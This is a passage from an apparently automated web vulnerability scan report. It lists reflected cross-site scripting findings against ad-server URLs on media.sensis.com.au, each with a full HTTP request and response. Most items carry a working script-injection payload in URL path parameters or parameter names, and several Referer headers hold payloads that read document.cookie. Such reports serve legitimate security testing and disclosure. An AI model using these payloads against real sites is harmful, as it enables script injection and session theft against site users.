P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?640d5"><script>alert(1)</script>475c70acbff=1" target="_new">
...[SNIP]...

2.685. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cb5"><script>alert(1)</script>5373d820f93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver29cb5"><script>alert(1)</script>5373d820f93/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:46 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc29cb5"><script>alert(1)</script>5373d820f93/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.686. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78925"><script>alert(1)</script>9424791b8b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random78925"><script>alert(1)</script>9424791b8b6=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:47 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random78925"><script>alert(1)</script>9424791b8b6=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=1229545
...[SNIP]...

2.687. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cd1"><script>alert(1)</script>dcd269cb395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?48cd1"><script>alert(1)</script>dcd269cb395=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:45 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 436
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?48cd1"><script>alert(1)</script>dcd269cb395=1" target="_new">
...[SNIP]...

2.688. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 227fc"><script>alert(1)</script>14d14ed3ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver227fc"><script>alert(1)</script>14d14ed3ca1/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:23 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000227fc"><script>alert(1)</script>14d14ed3ca1/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.689. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dd3"><script>alert(1)</script>35b30b58a96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomd0dd3"><script>alert(1)</script>35b30b58a96=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:24 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_randomd0dd3"><script>alert(1)</script>35b30b58a96=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.690. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f05"><script>alert(1)</script>beea6e6f093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?c9f05"><script>alert(1)</script>beea6e6f093=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:22 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 514
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fb92cb881e00000000/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?c9f05"><script>alert(1)</script>beea6e6f093=1" target="_new">
...[SNIP]...

2.691. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9521d"><script>alert(1)</script>27064bc6a15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver9521d"><script>alert(1)</script>27064bc6a15/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:21 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 360
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002dc331f459202000000009521d"><script>alert(1)</script>27064bc6a15/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415" target="_new">
...[SNIP]...

2.692. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9186b"><script>alert(1)</script>d44668a0661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random9186b"><script>alert(1)</script>d44668a0661=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:22 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 360
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002dc331f45920200000000/acc_random9186b"><script>alert(1)</script>d44668a0661=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415" target="_new">
...[SNIP]...

2.693. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdddb"><script>alert(1)</script>0dc27a31ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415?cdddb"><script>alert(1)</script>0dc27a31ae8=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/home/index.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:20 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 363
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0002dc331f45920200000000/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415?cdddb"><script>alert(1)</script>0dc27a31ae8=1" target="_new">
...[SNIP]...

2.694. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9009f"><script>alert(1)</script>bafec456006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver9009f"><script>alert(1)</script>bafec456006/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 375
Pragma: no-cache
Cache-control: no-cache
